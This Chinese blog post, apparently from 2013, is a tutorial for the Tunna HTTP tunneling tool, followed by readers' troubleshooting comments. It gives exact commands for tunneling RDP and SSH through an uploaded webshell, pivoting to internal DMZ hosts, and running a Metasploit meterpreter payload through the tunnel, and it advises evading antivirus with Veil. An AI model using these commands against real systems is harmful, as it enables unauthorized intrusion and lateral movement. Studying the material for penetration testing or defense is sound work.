tunna工具使用实例


原理:就是个HTTP tunneling工具

 +-------------------------------------------+                     +-------------------------------------------+
 | Local Host                                |                     | Remote Host                               |
 |-------------------------------------------|                     |-------------------------------------------|
 |   +----------+       +------------+       |   +-------------+   |   +------------+        +----------+      |
 |   |Client App|+----->|Local Proxy |<==========|  Firewall   |======>|  Webshell  |+------>|Server App|      |
 |   +----------+       +------------+       |   +-------------+   |   +------------+        +----------+      |
 +-------------------------------------------+                     +------------------------------------------ +

可以看出该工具先使用proxy.py监听本地一个端口,然后连接部署在远程WEB的webshell,远端的webshell会把端口转发请求转发到本地或者本地内网远程的主机,从而实现HTTP tunneling.这对于内网入侵来说,是很有用的一个工具.

该工具看起来是不是有似曾相识的感觉,恩.其实和reduh原理是一样的,不过tunna更稳定,速度更快.

下载地址是:http://www.secforce.com/media/tools/tunna_v0.1.zip

下面讲解4个实例,就能掌握该工具使用方法了.

实例1:

网站对外只开放了80端口,其他的端口都是关闭的,通过CVE-2013-225得到JSP的WEBSHELL后,上传conn.jsp,做转发,实现连接本机的其他端口.

直接扫描发现3389是关闭的

mickey@pentest:~# nmap -sS -p3389 219.x.x.x

Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-26 22:47 EDT
Nmap scan report for 219.x.x.x
Host is up (0.0088s latency).
PORT     STATE SERVICE
3389/tcp close  

通过webshell上传conn.jsp到主机上,本地开始连接

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v

参数含义如下:

-l 表示本地监听的端口
-r 远程要转发的端口
-v 详细模式

然后本地执行

rdesktop 127.0.0.1:1234

就可以连接到目标的3389了

实例2:

对于有些服务,比如SSH,还需要添加-s参数,才能保证连接的时候不会中断.

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 22 -v -s





ssh localhost -p 1234

实例3:

场景:已经得到DMZ区的一台主机的JSPSHELL,该主机的内网IP是172.16.100.20,通过查点,发现DMZ区还有其他的主机(172.16.100.20),并且开放了3389,我们想利用HTTP tunneling,连接到172.16.100.20的3389,命令如下

python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389

这里多了一个-a参数,意义是要转发的IP

实例4:

对于喜欢metasploit的朋友,该工具也支持,不过如果对方有杀软的话,建议先用veil做好meterpreter的免杀.

首先把tunna_exploit.rb拷贝到msf的modules/exploits/windows/misc目录.

cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc

然后开始利用

msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 1.3.3.7  <-- 注意这里是指本地的公网IP
RHOST => 1.3.3.7
msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
TARGETURI => http://219.x.x.x:8080/conn.jsp
msf exploit(tunna_exploit) > set VERBOSE true
VERBOSE => true
msf exploit(tunna_exploit) > exploit -j

tunna除了支持jsp还支持以下环境和脚本

conn.jsp Tested on Apache Tomcat (windows + linux) conn.aspx Tested on IIS 6+8 (windows server 2003/2012) conn.php Tested on LAMP + XAMPP + IIS (windows + linux)

使用的时候需要注意:metasploit里的脚本只对应metasploit使用.

评论

W

wefgod 2013-09-29 09:56:57

不错啊

Hxai11 2013-09-29 10:51:10

马克

S

Spy4man 2013-09-29 11:15:44

mickey兄是新一代的渗透高手!

海盗湾V 2013-09-29 14:42:10

学习了!

爱上平顶山 2013-09-29 19:54:02

靠 这个一定要

爱上平顶山 2013-09-29 20:14:37

楼主 求解答:
Remote service to connect to at remotehost:22
Traceback (most recent call last):
File "proxy.py", line 252, in
main()
File "proxy.py", line 243, in main
setup_tunnel()
File "proxy.py", line 120, in setup_tunnel
print opener.open(url).read()
File "E:\Python27\lib\urllib2.py", line 400, in open
response = meth(req, response)
File "E:\Python27\lib\urllib2.py", line 513, in http_response
'http', request, response, code, msg, hdrs)
File "E:\Python27\lib\urllib2.py", line 438, in error
return self._call_chain(*args)
File "E:\Python27\lib\urllib2.py", line 372, in _call_chain
result = func(*args)
File "E:\Python27\lib\urllib2.py", line 521, in http_error_default
raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 404: Not Found

C

c2y2 2013-09-30 08:54:45

很牛逼的样子哈 学习学习 mark

C

ccSec 2013-10-01 17:31:50

HTTP Error 404: Not Found

X

X,D 2013-10-11 11:46:09

很牛逼的样子

一个菜鸟 2013-10-15 07:49:58

该工具使用报错,大牛能解决一下不?

N

net2 2013-12-05 11:42:05

Warning: file_get_contents(compress.zlib://php://input) [function.file-get-contents]: failed to open stream: Inappropriate ioctl for device in /var/www/conn.php on line 138
主要问题出在这个地方。

N

net2 2013-12-05 12:54:02

删除compress.zlib://就ok。

C

CnCxzSec(衰仔) 2014-01-23 15:32:11

新一代。。。估计你还没玩hack的时候,Mickey就是国内的知名人士了。。

M

m0utain 2014-07-21 11:43:30

报的那些错误时是什么情况呢。

风萧萧 2014-07-30 15:22:55

COOL

W

www 2014-08-09 17:19:59

C:\Users\W\Desktop731TMP\tunna_0.1\release>proxy.py -u http://xxx.xxx.xxx.xxx/c
onn.aspx -l 80 -r 3389 -s -v
[+] Local Proxy listening at localhost:80
Remote service to connect to at remotehost:3389
[Server] All good to go, ensure the listener is working ;-)
[+] Spawning keep-alive thread
[-] Keep-alive thread not required
('[+] Connected from', ('127.0.0.1', 51454))
[+] Starting Ping thread
Received Data: 0 (0)
Received Data From Ping Thread: 0 (0)
Sent data: 19 (19)
Pings sent: 0
Received Data: 19 (19)
Received Data From Ping Thread: 0 (0)
Sent data: 19 (0)
Pings sent: 0
[-] Disconnected
Received Data: 19 (0)
Received Data From Ping Thread: 0 (0)
Sent data: 19 (0)
Pings sent: 1
[Server] Killing the handler thread
本机测试遇到这样的情况,请问前辈遇到过吗?

未了 2014-08-10 01:27:48

为什么非常不稳定? 刚连上就断掉了,根本没法用

T

Tixe 2014-08-19 16:12:49

楼主辛苦了,赞一个。
jsp连接ssh挺稳定的。
但连接aspx和楼上一样的情况,404:not found。
连接php,wamp的,连接就掉,。Fatal error: Call to undefined function socket_create() in E:绝对路径

W

wefgod 2014-08-21 15:55:58

今天试了下,压根连不上……立马掉

小健客 2014-09-12 22:39:53

额 试了一下 我的也是立马断的效果

G

gniq 2014-10-28 22:34:30

php的3389转发不知道什么原因总是连不上(猜测是集成环境的原因),ssh的倒是可以。

K

Kevini 2014-12-09 13:29:51

erver] All good to go, ensure the listener is working ;-)
] Spawning keep-alive thread
] Keep-alive thread not required
] Connected from ('127.0.0.1', 57495)
] Starting Ping thread
2JReceived Data: 0 (0)
ceived Data From Ping Thread: 0 (0)
nt data: 19 (19)
ngs sent: 0
2JReceived Data: 0 (0)
ceived Data From Ping Thread: 0 (0)
nt data: 19 (0)
ngs sent: 1
2JReceived Data: 0 (0)
ceived Data From Ping Thread: 19 (19)
nt data: 19 (0)
ngs sent: 1
] Disconnected
erver] Killing the handler thread
\Users\Kevini>python D:\release\proxy.py -u http://jczx.
aspx -l 1234 -r 3389 -v -s

D

DoubleHappy 2015-02-16 22:37:16

Mark

0

0hey_boy0 2015-04-15 15:34:15

涨姿势!!

H

hell0w0rld 2015-11-18 09:55:13

确实连不上。。 22 3389都连不上

路人甲 2016-01-10 16:00:08

[+] Local Proxy listening at localhost:8888
Remote service to connect to at remotehost:22
[Server] All good to go, ensure the listener is working ;-)
[+] Spawning keep-alive thread
[OK]
[-] Keep-alive thread exited
[Server] Closing the connection
连上后立刻断掉,这是什么情况?

马崧耀 2016-01-12 02:06:20

连接rdp,mssql,mysql都会断开。怎么破?

路人甲 2016-03-27 13:57:57

目标环境:win2003+tomcat
问题:一连接就出错了
[+] Local Proxy listening at localhost:1234
Remote service to connect to at remotehost:3389
[Server] All good to go, ensure the listener is working ;-)
[+] Spawning keep-alive thread
[-] Keep-alive thread not required
[+] Connected from ('127.0.0.1', 24595)
[+] Starting Ping thread
[-] Disconnected
[Server] Closing the connection

路人甲 2016-05-18 21:27:47

@爱上平顶山 我也遇到了一样的情况,你解决的吗,说下

V

Viigoss 2016-06-15 13:09:07

@爱上平顶山 你的问题怎么解决的???

mickey

此号多人用,发表任何信息不代表本人观点

twitter weibo github wechat

随机分类

安全管理 文章:7 篇
逻辑漏洞 文章:15 篇
Python安全 文章:13 篇
Web安全 文章:248 篇
渗透测试 文章:154 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录